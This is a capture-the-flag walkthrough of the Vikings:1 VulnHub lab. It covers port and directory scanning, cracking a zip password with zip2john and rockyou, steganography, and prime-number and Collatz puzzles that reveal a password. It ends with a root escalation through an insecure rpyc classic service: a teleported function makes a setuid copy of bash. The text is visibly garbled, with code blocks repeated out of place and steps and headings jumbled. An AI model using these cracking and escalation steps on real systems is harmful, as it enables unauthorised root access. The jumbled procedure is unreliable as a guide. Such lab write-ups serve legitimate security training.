Vikings -Vulnhub

Target drone download address: Vikings: 1 ~ VulnHub

The gap between this target drone and actual combat is quite large, very similar to the type of CTF

1. Host discovery

nmap -p 1-65535 -A 192.168.56.108

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|    2048  59 :d4 :c0 :fd : 62 : 45 : 97 : 83 : 15 :c0 : 15 :b2 :ac : 25 : 60 : 99 (RSA)
 | 256 7e:37:f0:11:63:80:15:a3:d3:9d:43:c6:09:be:fb:da (ECDSA)
|_  256 52:e9:4f:71:bc:14:dc:00:34:f2:a7:b3:58:b5:0d:ce (ED25519)
80/tcp open  http    Apache httpd 2.4.29
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2020-10-29 21:07  site/
|_
|_http-server-header: Apache/2.4.29 (Ubuntu)

OS details: Linux 4.15 - 5.6, Linux 5.0 - 5.4

2. Port Scan

Personally like to use dirsearch directly
dirsearch -u http://192.168.56.108/site/
If you don't find any useful information, try again. You must not be Buddhist when you scan the directory. Find a big dictionary and try it again.
gobuster dir -r -u http://192.168.56.108/site/ -x txt,html,php -w /usr/share/SecLists-master/Discovery/Web-Content/common.txt

3. Directory scan

cp /usr/share/wordlists/rockyou.txt.gz .

zip2john daima > hash
john hash --wordlist=rockyou.txt

4. Vulnerability discovery

Entering the page is the result: /war-is-over with a / Is it a path, continue to visit, the visit is successful, a lot of characters. Such a large character may be a file, download it with kali’s curl command

Here you can also use CyberChef to determine the properties of the content. The entropy module used , if greater than 7.5, is likely to be an encrypted or compressed file.

Use the detect file Type module to first base64 the decrypted content to check the file type. Found is zip

Decompression finds that a password is required, then it can only be cracked.

Use the tool: zip2john, encode the daima file, write it in hash, and then use a large dictionary

n = 0
for x in range(1000):
  if x < 2:
    continue
  h = int(x / 2) + 1
  for i in range(2,h):
      if x % i == 0:
          break
  else:
        n += 1
        print(n,":",x)

After decompression, the file name is king a picture, and no information can be seen.

It may be steganography, there is information in the picture. . Use the tool steghide to directly enter the installation, you can find that a password is required. I don’t know how to blast it. Try another tool. zip file found

def collatz(x):
        result = [109]
        while x != 1:
                if x % 2 == 1:
                        x = (3 * x) + 1
                else:
                        x = (x / 2)
                if x <= 255:
                        result.append(int(x))
        return result

print(collatz(109))

It can be guessed that the account floki password f@m0usboatbuilde7

5. Vulnerability Exploitation

Log in

import rpyc
conn = rpyc.classic.connect('localhost')
def getshell():
        import os
        os.system('cp /bin/bash /tmp/bashroot && chmod +s /tmp/bashroot')

fn = conn.teleport(getshell)
fn()

enter password

Try logging in to this account. I don’t know the password, I can’t try it, try sudo -s, it doesn’t work

Check the information, what is there, I found two files

Take it directly to translate, look at the boat

prime-number prime, meaning the 29th prime number

Colaz’s conjecture: a positive integer, odd * 3+1, if it is even, even / 2, loop, and finally get 1.

The meaning in boat is to find the collatz-conjecture result of the 29th prime number. The result of direct search on the Internet is 109. Here also write the algorithm of the python code:

n = 0
for x in range(1000):
  if x < 2:
    continue
  h = int(x / 2) + 1
  for i in range(2,h):
      if x % i == 0:
          break
  else:
        n += 1
        print(n,":",x)

Write another result to find the Koalas conjecture, because the prompt prompts that it can only be a printable value, the range of ascii encoding, so it is within 255.

def collatz(x):
        result = [109]
        while x != 1:
                if x % 2 == 1:
                        x = (3 * x) + 1
                else:
                        x = (x / 2)
                if x <= 255:
                        result.append(int(x))
        return result

print(collatz(109))

Tools to use: Convert decimal data first, then convert them to printable characters. Finally, after replacing the newline with a line, it is convenient to observe, the result: mR)|>^/Gky[gz=.F#j5P(

6. Elevation of Privileges

Use the password to log in to the ragnar account, and the password is required as soon as you log in. password for sudo. Attempts also failed, this should be a self-starting file.

Look for the file description of the self-starting program: Generally speaking, the self-starting files are among these, and .bash_profile have a look one by one.

The source of the self-starting file was found. .

$ /bin/bash -i input can make /bin/sh upgrade to /bin/bash shell

Check the permissions of that file, you can’t modify it, if you can modify it, you can bounce the shell, which is directly root.

Here I found that I was listening on port 18812. I checked the Internet and found that rpyc_classic is insecure:

Copy the root permissions directly here:

import rpyc
conn = rpyc.classic.connect('localhost')
def getshell():
        import os
        os.system('cp /bin/bash /tmp/bashroot && chmod +s /tmp/bashroot')

fn = conn.teleport(getshell)
fn()

Run bashroot and see the flags:

Another way of escalating rights:

It is found that it is in the lxd group, and you can escalate your rights here.

Input lxd, lxc, can be used.

Download failed here. Then I was too lazy to try. .

Leave a Comment

Your email address will not be published. Required fields are marked *